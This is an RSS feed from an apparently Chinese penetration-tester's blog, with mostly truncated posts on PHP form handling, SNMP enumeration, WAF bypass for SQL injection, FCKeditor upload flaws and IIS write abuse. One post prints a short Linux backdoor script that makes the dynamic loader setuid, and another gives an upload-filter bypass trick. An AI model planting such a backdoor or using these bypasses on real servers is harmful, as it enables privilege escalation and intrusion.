WangJun's Blog http://www.wangjun.cn/ 美好的生活需要用心记录 关注计算机网络安全 Powered by SaBlog-X. Copyright (C) 2003-2010. SaBlog-X Version 2.0 Build 20100301 Thu, 23 Feb 2012 04:56:41 +0000 30 http://www.wangjun.cn/archives/100/ http://www.wangjun.cn/archives/100/ PHP 获取Get POST提交表单的参数值 897194@qq.com(wangjun)  

PHP 获取 Get、POST 提交表单的参数值:

PHP 获取 Get、POST 提交的参数值:

注意:函数 Get、POST 必须大写!

获取所有提交(区分参数大小写):$_REQUEST['ip']

获取Get提交(区分参数大小写):$_GET['ip']

获取Post提交(区分参数大小写):$_POST['ip']

使用示例:
    1、$ip = $_POST['ip'];
    2、echo $_POST['ip'];

 

转自 http://lcx.cc/?FoxNews=745.html

]]> http://www.wangjun.cn/archives/100/ 渗透测试 Sat, 11 Feb 2012 17:00:19 +0000 http://www.wangjun.cn/archives/99/ http://www.wangjun.cn/archives/99/ 如何测试XSS漏洞(转自淘测试) 897194@qq.com(wangjun) 文章需要输入密码才能浏览. http://www.wangjun.cn/archives/99/ 渗透测试 Thu, 09 Feb 2012 11:27:33 +0000 http://www.wangjun.cn/archives/98/ http://www.wangjun.cn/archives/98/ 常简单的Python HTTP服务(转) 897194@qq.com(wangjun) 如果你急需一个简单的Web Server,但你又不想去下载并安装那些复杂的HTTP服务程序,比如:Apache,ISS等。那么, Python 可能帮助你。使用Python可以完成一个简单的内建 HTTP 服务器。于是,你可以把你的目录和文件都以HTTP的方式展示出来。佻只需要干一件事情,那就是安装一个Python。

阅读全文

]]> http://www.wangjun.cn/archives/98/ 技术相关 Thu, 26 Jan 2012 23:08:59 +0000 http://www.wangjun.cn/archives/97/ http://www.wangjun.cn/archives/97/ 常用绕过防注入的11招 897194@qq.com(wangjun) 在给一些公司做渗透的时候,经常遇到对方服务器前面架设有WAF的情况,也许最终不能成功利用sql注入漏洞,但至少能搞清楚目标服务器是不是有sql注入漏洞.

阅读全文

]]> http://www.wangjun.cn/archives/97/ 渗透测试 Wed, 11 Jan 2012 17:31:26 +0000 http://www.wangjun.cn/archives/96/ http://www.wangjun.cn/archives/96/ IIS写权限的利用 897194@qq.com(wangjun) 很老的一个东西,记录在这里主要是为了方便以后的工作。

阅读全文

]]> http://www.wangjun.cn/archives/96/ 渗透测试 Tue, 10 Jan 2012 22:14:04 +0000 http://www.wangjun.cn/archives/95/ http://www.wangjun.cn/archives/95/ snmp信息的使用 897194@qq.com(wangjun) 常用 SNMP 对象 ID

sysDescr.0                1.3.6.1.2.1.1.1.0
sysObjectID.0             1.3.6.1.2.1.1.2.0
sysUpTime.0              1.3.6.1.2.1.1.3.0
sysContact.0               1.3.6.1.2.1.1.4.0
sysName.0                 1.3.6.1.2.1.1.5.0
sysLocation.0            1.3.6.1.2.1.1.6.0
sysServices.0           1.3.6.1.2.1.1.7.0
ifNumber.0                1.3.6.1.2.1.2.1.0
tcpCurrEstab.0
 
snmpget -v 2c -c public 192.168.21.159 sysName.0
获取设备的名字
 
snmpwalk -v 2c -c public 192.168.21.159
遍历snmp树
 
snmpstatus -v 2c -c public 192.168.21.159
获取简化的系统状态
 
参考文章
http://www.ibm.com/developerworks/cn/aix/library/au-satsnmp/index.html
]]> http://www.wangjun.cn/archives/95/ 技术相关 Fri, 06 Jan 2012 22:58:51 +0000 http://www.wangjun.cn/archives/94/ http://www.wangjun.cn/archives/94/ 继续爆料:linux下留本地后门的两个方法(转) 897194@qq.com(wangjun)     公司某群中有人问 bash_profile 里PATH设置成 "." 有啥危害,有人发了这篇文章出来,某大牛发了一段shell脚本。

#!/bin/sh

rm -f ./ls
chmod 4755 /lib64/ld-linux-x86-64.so.2
/bin/ls

 


 

阅读全文

]]> http://www.wangjun.cn/archives/94/ 技术相关 Thu, 05 Jan 2012 23:08:16 +0000 http://www.wangjun.cn/archives/93/ http://www.wangjun.cn/archives/93/ 宅男的2012元旦假期 897194@qq.com(wangjun)    第一天,收到了网购的GALAXY Note和圣 jec iphone4/4S镜头3件套并重装了工作用的笔记本电脑,换上了64位win7系统。第二天,云舒在杨公堤曲苑风荷晒太阳喝茶的时候,我在百脑汇买内存条。第三天把2004-2008年左右的日志导入了现在这个地方。

阅读全文

]]> http://www.wangjun.cn/archives/93/ 生活琐记 Tue, 03 Jan 2012 15:18:58 +0000 http://www.wangjun.cn/archives/9/ http://www.wangjun.cn/archives/9/ IOS5.0.1完美越狱成功 897194@qq.com(wangjun) 今天晚上看到IOS5.0.1完美越狱放出,立刻进行了测试,到目前为止一切正常。过程比较简单,不过要先弄清楚什么是DFU模式。

 

 

阅读全文

]]> http://www.wangjun.cn/archives/9/ 生活琐记 Wed, 28 Dec 2011 00:17:00 +0000 http://www.wangjun.cn/archives/8/ http://www.wangjun.cn/archives/8/ fckeditor <= 2.6.4 任意文件上传漏洞 897194@qq.com(wangjun)  fckeditor <= 2.6.4 任意文件上传漏洞

阅读全文

]]> http://www.wangjun.cn/archives/8/ 渗透测试 Sun, 18 Dec 2011 18:26:01 +0000 http://www.wangjun.cn/archives/7/ http://www.wangjun.cn/archives/7/ 解决Fckeditor删除所有上传页面如何上传入侵 897194@qq.com(wangjun) 解决Fckeditor删除所有上传页面如何上传入侵

转载自:http://www.91ri.org/2641.html

阅读全文

]]> http://www.wangjun.cn/archives/7/ 渗透测试 Sun, 18 Dec 2011 17:02:40 +0000 http://www.wangjun.cn/archives/6/ http://www.wangjun.cn/archives/6/ Fckeditor漏洞利用方法总结 897194@qq.com(wangjun) From:http://huairen.me/archives/369.html

1.查看编辑器版本
FCKeditor/_whatsnew.html
=============================================================
2. Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
=============================================================

阅读全文

]]> http://www.wangjun.cn/archives/6/ 渗透测试 Sun, 18 Dec 2011 12:17:51 +0000 http://www.wangjun.cn/archives/5/ http://www.wangjun.cn/archives/5/ Linux常用命令 897194@qq.com(wangjun) 一些常用Linux命令,非常有用

阅读全文

]]> http://www.wangjun.cn/archives/5/ 技术相关 http://www.wangjun.cn/archives/5/#comments Mon, 17 Oct 2011 21:52:10 +0000 http://www.wangjun.cn/archives/4/ http://www.wangjun.cn/archives/4/ POST比GET安全? 897194@qq.com(wangjun)       最近有个项目是对某银行做渗透测试,找出潜在的安全漏洞。由于我们这里经验不足,渗透工作主要是总部研究院的同事做的。在他们提交的渗透测试报告中提到 “大部分的POST请求都可直接转换为GET请求” ,很明显是想说POST比GET安全。后来去银行做渗透测试结果交流的时候,银行的技术员问到为啥POST比GET安全。。一时不知道该从何说起,只知道GET提交的参数浏览器会缓存,如果通过GET提交帐号和密码进行登录,其他人查看浏览器的历史纪录,那么别人就可以拿到你的账号和密码了,但是现在基本上没有人用GET提交帐号和密码吧?另外web服务器的日志中也会有记录, HTTP头部的referer里会记下URL里请求数据。。基本上就这些。。说服力不是很强。回来后找了下资料,下面这篇文章讲得比较全面。应该是参考了网上一些资料后总结出来的。

阅读全文

]]> http://www.wangjun.cn/archives/4/ 技术相关 Sun, 09 Oct 2011 09:58:03 +0000 http://www.wangjun.cn/archives/3/ http://www.wangjun.cn/archives/3/ Paros终于正常工作了 897194@qq.com(wangjun) 今天很开心..Paros终于可以截获目标网站的数据了.

因工作需要,需要对一个网银做渗透测试,主要是一些逻辑漏洞.比如能不能在自己的网银获取别人的网银的余额,转帐记录等.

于是安全了Paros, Paros的Trap功能很实用,可以截获封包并修改后再发送,相当于一次中间人攻击.Paros需要安装JAVA环境,于是安装了最新版本JDK 7.0

测试的过程中发现,别的https网站都能正常打开,只有目标网站不行.目标网站的端口不是默认的443,而是改成了另外的端口.因为对于https不熟悉,对证书也不了解.通过浏览器的提示,一直以为是证书的问题,或者是Paros只支持标准的https端口.后来注意到在尝试打开这个非标准端口的网站的时候会提示IO Error或通讯实败,才基本上确定是软件方面的问题(已经尝试了多个操作系统和浏览器).后来同事在他机器上试了下,正常!对比了一下环境,唯一的区别就是他的JDK是6.0.....果断换成JDK6.0..问题解决了.真的很意外,最新的JDK反而不支持了.最新的不一定是最好的.

]]> http://www.wangjun.cn/archives/3/ 技术相关 Sat, 08 Oct 2011 23:50:39 +0000